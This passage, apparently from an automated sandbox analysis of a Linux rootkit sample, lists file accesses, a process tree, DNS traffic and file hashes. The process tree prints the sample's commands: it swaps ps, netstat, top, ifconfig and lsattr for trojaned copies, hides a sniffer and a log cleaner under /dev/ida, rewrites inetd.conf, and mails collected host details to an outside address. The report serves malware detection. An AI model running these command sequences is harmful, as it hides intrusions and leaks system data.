| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/8/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/331/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/848/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/700/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/748/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/425/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/10/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/123/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/701/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/152/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
| File opened for reading | /proc/70/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/exim4 | N/A |
| File opened for reading | /proc/9/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/337/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/uptime | N/A |
| File opened for reading | /proc/14/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/713/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/110/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/675/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/247/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/15/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/18/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/677/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/716/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/172/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /usr/bin/uptime | N/A |
| File opened for reading | /proc/18/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/24/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/672/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/16/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/122/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/334/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/686/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/848/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/677/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/700/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/707/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/self/mountinfo | /bin/df | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/707/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/12/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/19/stat | /usr/bin/killall | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/mv | N/A |
| N/A | N/A | /sbin/ifconfig | N/A |
| N/A | N/A | /usr/sbin/sendmail | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/sbin/sendmail | N/A |
| N/A | N/A | /usr/sbin/sendmail | N/A |
| N/A | N/A | /bin/grep | N/A |
| N/A | N/A | /usr/sbin/sendmail | N/A |
| N/A | N/A | /bin/mv | N/A |
| N/A | N/A | /sbin/ifconfig | N/A |
| N/A | N/A | /bin/grep | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/computer | /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 | N/A |
| File opened for modification | /tmp/mup8k2Yg | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mu4jyQB7 | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mubyrMXg | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mufGZHz6 | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muvgRZWW | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muAoNLeb | /usr/bin/mail | N/A |
| File opened for modification | /tmp/muuYdpXh | /usr/bin/mail | N/A |
| File opened for modification | /tmp/mus5KVAr | /usr/bin/mail | N/A |
Processes
/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118
[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]
/usr/bin/clear
[clear]
/bin/chown
[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-9fuBn9]
/bin/rm
[rm -rf /sbin/ifconfig]
/bin/mv
[mv ifconfig /sbin/ifconfig]
/bin/rm
[rm -rf /bin/netstat]
/bin/mv
[mv netstat /bin/netstat]
/bin/rm
[rm -rf /bin/ps]
/bin/mv
[mv ps /bin/ps]
/bin/rm
[rm -rf /usr/bin/top]
/bin/mv
[mv top /usr/bin/top]
/bin/cp
[cp -f mkxfs /usr/sbin/]
/usr/bin/touch
[touch /dev/rpm]
/usr/bin/touch
[touch /dev/last]
/bin/mkdir
[mkdir -p /dev/ida/.drag-on]
/bin/mkdir
[mkdir -p /dev/ida/.. ]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]
/bin/rm
[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]
/usr/bin/touch
[touch /dev/ida/.drag-on/tcp.log]
/usr/bin/touch
[touch /dev/ida/.. /tcp.log]
/bin/cp
[cp -f inetd.conf /etc]
/bin/cp
[cp -f services /etc]
/usr/bin/killall
[killall -HUP inetd]
/bin/rm
[rm -rf /usr/bin/lsattr]
/bin/cp
[cp -f lsattr /usr/bin/]
/bin/chmod
[chmod 500 /usr/bin/lsattr]
/usr/bin/chattr
[chattr +i /usr/bin/lsattr]
/usr/bin/lsattr
[/usr/bin/lsattr]
/bin/sleep
[sleep 1]
/bin/uname
[uname -a]
/bin/hostname
[hostname -f]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep inet]
/usr/bin/uptime
[uptime]
/bin/grep
[grep vendor_id]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep model]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep MHz]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/bin/cat
[cat /proc/cpuinfo]
/bin/df
[df -h]
/bin/cat
[cat computer]
/usr/bin/mail
[mail -s placinte [email protected]]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240729-en-2 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGU-0000Cf-HU]
/usr/bin/mail
[mail -s roote [email protected]]
/bin/cat
[cat computer]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240729-en-2 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGU-0000Cf-HU]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGW-0000Cp-8E]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGW-0000Cr-Es]
/bin/rm
[rm -rf last lk.tgz computer lk.tar.gz]
/usr/bin/clear
[clear]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGW-0000Cp-8E]
/bin/chown
[chown root.root bin boot dev etc home initrd.img initrd.img.old lib lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinux vmlinux.old]
/bin/rm
[rm -rf /sbin/ifconfig]
/bin/mv
[mv ifconfig /sbin/ifconfig]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGY-0000D1-JD]
/bin/rm
[rm -rf /bin/netstat]
/bin/mv
[mv netstat /bin/netstat]
/bin/rm
[rm -rf /bin/ps]
/bin/mv
[mv ps /bin/ps]
/bin/rm
[rm -rf /usr/bin/top]
/bin/mv
[mv top /usr/bin/top]
/bin/cp
[cp -f mkxfs /usr/sbin/]
/usr/bin/touch
[touch /dev/rpm]
/usr/bin/touch
[touch /dev/last]
/bin/mkdir
[mkdir -p /dev/ida/.drag-on]
/bin/mkdir
[mkdir -p /dev/ida/.. ]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]
/bin/cp
[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]
/bin/rm
[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]
/usr/bin/touch
[touch /dev/ida/.drag-on/tcp.log]
/usr/bin/touch
[touch /dev/ida/.. /tcp.log]
/bin/cp
[cp -f inetd.conf /etc]
/bin/cp
[cp -f services /etc]
/usr/bin/killall
[killall -HUP inetd]
/bin/rm
[rm -rf /usr/bin/lsattr]
/bin/cp
[cp -f lsattr /usr/bin/]
/bin/chmod
[chmod 500 /usr/bin/lsattr]
/usr/bin/chattr
[chattr +i /usr/bin/lsattr]
/usr/bin/lsattr
[/usr/bin/lsattr]
/bin/sleep
[sleep 1]
/bin/uname
[uname -a]
/bin/hostname
[hostname -f]
/bin/grep
[grep inet]
/sbin/ifconfig
[/sbin/ifconfig]
/usr/bin/uptime
[uptime]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep vendor_id]
/bin/grep
[grep model]
/bin/cat
[cat /proc/cpuinfo]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep MHz]
/bin/grep
[grep bogomips]
/bin/cat
[cat /proc/cpuinfo]
/bin/df
[df -h]
/usr/bin/mail
[mail -s placinte [email protected]]
/bin/cat
[cat computer]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240729-en-2 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGi-0000EP-Hf]
/usr/bin/mail
[mail -s roote [email protected]]
/bin/cat
[cat computer]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGi-0000EP-Hf]
/usr/sbin/sendmail
[/usr/sbin/sendmail -oi -f root@debian9-mipsbe-20240729-en-2 -t]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGl-0000ET-NH]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGm-0000EU-Jj]
/bin/rm
[rm -rf last lk.tgz computer lk.tar.gz]
/usr/sbin/exim4
[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGm-0000EU-Jj]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t2jGo-0000Ed-F4]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240729-en-2 | udp |
Files
/dev/rpm
| MD5 | 4e6ac6c2a2fecfe1e88ed9ef72c2d2cd |
| SHA1 | 76015ef9244670de728b830ad330c536f42c4e39 |
| SHA256 | 625d8ffa241021399ea6cf2f8f6ceaa5b19bee660bed532ef6c7dbead906917c |
| SHA512 | 1c8c0e2a26bb9cbef13ececacda94d9e8403646eb120596540bf040e672338b5c21333f1172d1822b5c87419a35437ea111324c5b0e3196d35407acf74e544f7 |
/dev/rpm
| MD5 | 7d298531c8d0893706bf9c76a40f8386 |
| SHA1 | 36f5cc01e0b6bcac92aa01055f3eb1bf45bf36bf |
| SHA256 | 03d0ea06da1c004ba7e1ae10d04444e235a4b8cf8451d610f771c539d1387f1a |
| SHA512 | 38f915c4921b801fe5b560fd9be4bc92705ee1376812f377d15a41bf2424f7e7324ea6cc6e103acee23940a4a8c93f1829a2b20fd5c3c22bb5542ce17d2ad973 |
/dev/rpm
| MD5 | 1894a58fd103ccce773c667411597492 |
| SHA1 | 248701dcabbff132054e34fd86f9afbd3746ea38 |
| SHA256 | 0b3158157a0891176e648dca6743c6f62c2a0ea6c5ba7f33bc8740ae42513d12 |
| SHA512 | c3c622fcac2163a71132dc706cf26b4e87912ee9fb13b593708d6c71c8a72fcca1b34bc97e6cf6f732308ac30475b2f047e2a315162f7314c24ae65413561f9a |
/dev/rpm
| MD5 | 1d0177d6d6d055555eb272249d89f54d |
| SHA1 | 6137ecd54c6ca43dbe4bc63a030b817a94a2a5e3 |
| SHA256 | cab38856d96e2273d9ca9e8eec5c4428dea21d90fcc1005d23d43db7508b9c9e |
| SHA512 | fad8ef62c3c5316497524e6c0101ed3e57b09ec892f902849d771d682b90430a6b7a588e1e10f8c93f01feb9f5f702bf1bcd5b8be2e12dfbcdbfec2b024e22ab |
/dev/rpm
| MD5 | a56a4ee13c1681711fb6217ec17a8abc |
| SHA1 | 6193fa49399265b3efbc7ec47760a23749a278a3 |
| SHA256 | 610c4e3a32f6e1fb38d082ed6ed86b1c0fcc42314df0e6d8f5c7ea70afb6dba4 |
| SHA512 | 86d576cf220f3a37ced1348aad2d799c692a13206d1709537123a7726174481ab9cb1fcf9f5046b072ff657e4becb0ae7ee83b8d5e18ef317930fe8de2cc0ec0 |
/dev/last
| MD5 | 29b9e96e561662774c048aaf62f63f99 |
| SHA1 | 0765b1eaf2054c54fe82e1326617d919f5f200fc |
| SHA256 | 76025f97d8ea5be475bad1e9ba9579059ef456583b63a71fcef9bbe055e865ec |
| SHA512 | 1db52eabbd3250a830155d0ad8b486c4dbe5fbf043f9bd45b6cf8982cae4c974e4cfe862f74824e091905b79d8cde6a6c6c71541a782aaf9e917282612eb457a |
/dev/last
| MD5 | ed90c163bc4809cfba41afe945d8c3ac |
| SHA1 | 3fc77c1038907a6540022911bb9f74ab260ed576 |
| SHA256 | 1b70087ed15d011f96f1c7ee24133cdb96fa80e07d9086bac204f46663ad9954 |
| SHA512 | a2ad80478649090d1294be13b410e2434a170aa027d1e5329c30ea805b8d8c5c0e8f018cd8183c7bd2bfe7fd4ed0cd351c8ac8e78503f250cc352726a4442917 |
/dev/last
| MD5 | 81ef1d399417bc7c03d5454d426e0e30 |
| SHA1 | e830de7de2fedc8688ded4335b6be7f0dcc2cf13 |
| SHA256 | 6fff47dbd5fd120ab99a02baa33485f872f066beb802da8a594dabfcd43ae89b |
| SHA512 | 89551b76b13cecc8e295a11b0c9e7a334e2448202461a58f1dd14398a9f92d9b56089b285e3cfae9b950b88dc8f8aa48a812cef8bd1aa6696be51edb62adfbeb |
/dev/last
| MD5 | ea4abc4909616408ea03fca58e9daf78 |
| SHA1 | c368533d40cbcf2d43c2b0f493bced7496fedafd |
| SHA256 | 574eb71079a9afe0d64c42a205368f6df46e1de0c98d28e3ba145045dba86ced |
| SHA512 | 92a1b480592675ff260a8659c179e788e50fbc846562ac2dbe9f5f11fbfd8bb6b3d2574c9c51a2f08ea506e5b719d4ca528ae5a1a51dd6a930425462eee4ab75 |
/dev/last
| MD5 | a2e384cb9bf939430cc6d44800052952 |
| SHA1 | 3cafe08a106154033956aa6bbf2605e0ac94c290 |
| SHA256 | 89558b7545ed41e4938774fac4e78696d61eb06a6f20755a2aa056becf3f8532 |
| SHA512 | 61aae5e24e101efab9db03dd6118fc95252c39088310b1d1172738565a456bb11d9a5ad84df82b2346d0ba4aae10f798889fe566c4a44e48f3a376f279d72058 |
/tmp/computer
| MD5 | 2f1f70995dff6a1fa46b5dd1c5abd012 |
| SHA1 | 0d1a3d21fce038964eda593a16a064a9b743b4aa |
| SHA256 | 0e033a1b1adb9ececd4d8e55694413d2cdec7914bbacde1ad9c30f383032cb47 |
| SHA512 | 3ab75edd449f12b65157f313a68b373332d54d06789cdde03dd317e5ae497181b86cd0deb23c3bfc17e4ea2dbe4880ee87442fbc557b6f5684c4d68b52f23e0e |
/tmp/computer
| MD5 | e115cf5801c968647dd980fb99dc0e26 |
| SHA1 | f4c3f005d6a84a8f36e7d15a0964d0e19a89d12c |
| SHA256 | 0998e39acef0ac841714996ac49d4f453a910d500d88e1263a4952bae3372167 |
| SHA512 | 98078546964bc5add1d881d0d40f7a601b91e31affb7f585f79c65760d1cfdd80075b1672e9776ed7ede9dbd07019c328b759695ff5780038a4e40c7281d68ec |
/tmp/computer
| MD5 | ef44044425f734acb6f6b64a9092c274 |
| SHA1 | d5ebb4b6bf49b30a9944bffb1b72a6543279c91c |
| SHA256 | ba6a967e8c6042e40004710da39ca49369b3b13c7e5625096ebac0736c124258 |
| SHA512 | 951d96fa0de9bbdef4c80d0d42a8076f427acacd3e4980da14e7069a3878e2496e7058d6e1f3ef4969cc15e18dccb9a515cb955ac670c46db8e95e76ab2fa4e3 |
/tmp/computer
| MD5 | ec2030fc8a8fe88658f9251f7ff3706e |
| SHA1 | 3b2feaaf69b87561dd36eb50a293fe757a1e5be3 |
| SHA256 | 7adb67c7a6735530cb92573ae4892583bef62083ea10f0db2ef88bede35d5703 |
| SHA512 | 2ed82e2b1b535e2aec2ac5902e4284ec9a8770a438c9ed7c827bca06d0f25a974b0fef8459ecb6d6fd2427ab9db434d924631c94987b7243095bdb40702802e3 |
/tmp/computer
| MD5 | 6451702bf4a40cfdf0e428f3e94791a0 |
| SHA1 | 754d1ede626fb401a6bbe086c8c1fedcdf003332 |
| SHA256 | fcfc600f96f3ec38e345bc5912fdb182d449856c99b874614269a8aa6854047c |
| SHA512 | 3c9a48701cd3586dc143b1fda03ba3192a467752023b4e45f5c69c1b1fdef5e7df5edc2b87cce9f1a62db4a441db50b963257020dd6ae7fc2781f607cd452563 |
/tmp/computer
| MD5 | 991e8c6753f7b674cc967714e1401b20 |
| SHA1 | 208880a897eba4e4e4a1fe1cab06c20ef74c4820 |
| SHA256 | 34e1c0b82b5ed01654c9a9737a4c91677ef2f6ac782595288cbd2d9bece916c3 |
| SHA512 | b075f822e9990b5c28ee79e930d430d5c252ba377c87ab1c9937bc957c3c915961f45d451091f0f7f3f3821f113a5cae6394652cf5992b2646f279182ed93bf6 |
/var/spool/exim4/input/1t2jGU-0000Cf-HU-D
| MD5 | 72457c62c84782a429385b91c426bb9d |
| SHA1 | 353d60cf5003d53b5e195969ae03403d56aa436d |
| SHA256 | 6cc7bb5cf4cbc2c5cfad67ab05665e6d35a9d85dbe3b2e1d11939fa217aa2a31 |
| SHA512 | 4a8f4dfa5fdd26f56f53710c1aea00207c2016d410318dfcd72ad65f0a67069d82d92e6c1ce7db732de3a8ed14d90a2e0e1575950834ff4266700db493b5c9b9 |
/var/spool/exim4/input/hdr.785
| MD5 | 0789a0c1546c9b6ed215c3009bae939d |
| SHA1 | aff9d1f87ea8986c4c4e2713c4b32053c17fbe78 |
| SHA256 | 02b4274cd365c677c3d8865a2137c894c957ffb2a59df259664f0d7181f466e1 |
| SHA512 | 1b224bf930d73313486a4369f5c8806d3280e47475dbe1b3fe8d5a61c1fe8000951849a16d20e1cef3b2b837528e9998afbc5b14313a045a4cf9a6594aedebcb |
/var/spool/exim4/msglog/1t2jGU-0000Cf-HU
| MD5 | 2b74306616ad3a7121add9f660dec871 |
| SHA1 | f1b5a3ddffb41e11a17b022f9eebc222959db99d |
| SHA256 | 6b1613ec3ce23c9e787470dbc22654476e30a3e84d399a66f7b50f31d363bdc2 |
| SHA512 | fbd85d434d5d3ef5c88eaec1ef2c043558a202f26864c59934cacbaaabe04eb69fabb54b83ef4d60eab0b6d5b42327f83b78474e8d9c65d1f07863c3c1879b03 |
/var/spool/exim4/msglog/1t2jGU-0000Cf-HU
| MD5 | d229046faa5eb269861917bb1f8efb27 |
| SHA1 | 8e2767dfe4199e0d8f82979e3e1a0acf959be505 |
| SHA256 | aabba892a32fc2040ba20e0e63e42f7594e039799cac8bc1255507a09ada94e3 |
| SHA512 | ba2d72fbcd4ea17681fcf8d0b75030a628b58044323a525726eb82b6e1a2f63535f7342c20668c30a1ef14da6608f10f7bf62a3ce477212184fcdfcb4b53cb9f |
/var/spool/exim4/input/1t2jGW-0000Cp-8E-D
| MD5 | e2eccb39d304e1d67c2598b98d9b71d9 |
| SHA1 | 388a8564dec9a03775441fd4442243083fb822f0 |
| SHA256 | f683aec49997810378e8209c41442d6e567bd41631e76cd469eaa46a0d4bd092 |
| SHA512 | d5d86d5cead5d230ca9deb143cd548ea6e0d19bce13036a2714f04fd58e1e4fa051d1743279daa7dc60424c243559dd50585c121198ecccd5486bacd5eb0dcd0 |
/var/spool/exim4/input/hdr.795
| MD5 | b7a98005cfccc7ce0e98f7edcc982ed0 |
| SHA1 | e8aaf1b602e0520f74c1f69939df072fe50602ab |
| SHA256 | 6e53c876962f815cb561012bd6e61647a5ae961928afee17c69690ed43cbe8dc |
| SHA512 | 349771a3a3d53d8b1149cbb752d98cac24eb76b0437649b73d5effa2ff3e983eb55daef029cbb0f023b770a9726a880f4419f6b71908e97bca7dc6361c5859a7 |
/var/spool/exim4/msglog/1t2jGW-0000Cp-8E
| MD5 | 4ca60eb1f4051d2106103b599acf83ca |
| SHA1 | ae20fe40779afe379701a6c42ba0f0b1258c13e6 |
| SHA256 | 76f7670f0d02a8692819920b79909e2b40de0797a214f1c6e8ad0912e0f3cf65 |
| SHA512 | 0d02cedcb68b6e203b2c4893e071aad3849ed4401746a3854b2cebcbabcd56cb28299a6c082501fe3e46faa0cfc03ce88567b62d31294f299bf1676aaebb0908 |
/var/spool/exim4/input/1t2jGW-0000Cr-Es-D
| MD5 | 7b2b54a6a7042bbf6279ca38c67bed4d |
| SHA1 | 90b7faa6f95fb10eaaa15a695ee274546227b1cd |
| SHA256 | 5aaade5035e24eb219793891f40d38c17b7a6d226f6570f443c296840fabcef0 |
| SHA512 | 7a662049814cf51499265b09125e9c6fc1474f91c341f750356aae67cbac5ff3f8c03e9f54d7d42182393118d3da5c034363a82abef2d43676f084c8a73eb33c |
/var/spool/exim4/input/hdr.797
| MD5 | ca2fbb75a9ba20bc27a1d8af4d41adde |
| SHA1 | 72f8b918eda79bdf4bc9682904b614035e2d7975 |
| SHA256 | 282fab896f56bdc59cff78abe2f64d3faa085cfc24acddf841fac3a68309410d |
| SHA512 | bfac843c9559ed5395b54f81231ad550c59fde64d909cd52fd34a9abcd6f6048f18cfcc1e32cdbc55d6ef42ea33cfd1fd7abb49bd70ffad9dfddd847ab0e611b |
/var/spool/exim4/msglog/1t2jGW-0000Cr-Es
| MD5 | 78745f4ba05af9d73f90a7efba873e9c |
| SHA1 | 3185246f32de574eee7043179cbd908e288fd63c |
| SHA256 | d85919aaf568004c1b7e45a6709bc25840716ced2443967e72ca9745c2238c93 |
| SHA512 | 5971da97702197e429ef313ba28fc56f9c5a18064a149800e2eb50ae6fa26bbf68eaf14122eaf08caddfffe1f3b6ddd1374e53afbf7c5108d54f0a277e295d49 |
/var/spool/exim4/input/hdr.790
| MD5 | 8123e34a605ba1384e0dcc54b71da0d2 |
| SHA1 | 067e00a52a471aef3f88283077556dda1fa6310b |
| SHA256 | d99ccdd1fbf82baec01459cccd2be3f83a8b7d0ded61f63318c1a4d30535d7c7 |
| SHA512 | 290805dff106861b8155ea686f6db5f6c1c6dff5d5aff185fd47bf4e1fcd204f67e47f157ac713c859ece3d8526cbeeb73b92559c697c08c4cfe6eae3f3c1b70 |
/var/spool/exim4/msglog/1t2jGW-0000Cp-8E
| MD5 | 0ea06ec44aecb5e0294e4026b8a0f242 |
| SHA1 | c2fda5935919f1855a70e5242ae36f7af38e2d5d |
| SHA256 | f3d6f6d8cd372d67fe11b4d96fd26b4c28808fba4ca5029b4dab2afeb91abfea |
| SHA512 | b2249c8e62fb48191c8c09487bfd4a1601fa717b647962da812ec11ed9176b7ccf09cffafeaf82e49d1ed7d0fc36f1341665ec987e89b29d6d9d113b3a200fc7 |
/var/mail/user
| MD5 | 23b3270454f0c8dc39d67d17d502c161 |
| SHA1 | 6b67e2b2fbf2ec987c95d5e9e7ea9814982470ae |
| SHA256 | aaae7163b7505ed5ae7a26669b35fb10d9a665c9254155b9b5770497a93fd2fd |
| SHA512 | 08225b28128ae450634b07c4b139302c41cff5cfb956f8d734d12e8edd114c98b103f5cb5eb67f7d427203642a33993c8f2f74eaec4ca879ef3028b5bee26276 |
/var/spool/exim4/input/1t2jGW-0000Cr-Es-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1t2jGW-0000Cr-Es
| MD5 | f3be0f19bff259e0194781119b7d44c9 |
| SHA1 | fa0f047c1d2e5cd594882cc39ee8917b25086aaf |
| SHA256 | 887a20ebcf4da88858748c1bea99a0f292ec7f8081323eb40e30f313fd2c2bd6 |
| SHA512 | 8af3ba373d1b697a9dfff3f35fca53f177029ec91a5dd239ca6116348aab2a841e5ba8512f1a0bce04043ae61e1c41dfd82f0d23c70d0ea40ca69400a7d2c486 |
/var/spool/exim4/input/1t2jGY-0000D1-JD-D
| MD5 | 2712e6b0887733a699fed993225db397 |
| SHA1 | 37162182c2b1f444ef5ab321ae71e62e8cd96334 |
| SHA256 | 0187c9400cddfd6be65546ce32583d0e67b181db43794a9d38c8f3fd92a7824b |
| SHA512 | fea638242cf0f1196e57c343aa22c2f3e746c9d618dc3160b230956209a9d3980e44842ee33f2ba781db2d79604b4636b7a1a5e007bb1c19923a5459743d63e6 |
/var/spool/exim4/input/hdr.807
| MD5 | 9a9a70eb243a0b7c6eea5a5434119aec |
| SHA1 | d657dd2f0fc77fd8220093f86ce05dfeebcd0b6f |
| SHA256 | 0638c0970f7516d1c01ef4454c24120eeca4065683a1c12110ac88b34b19d1ea |
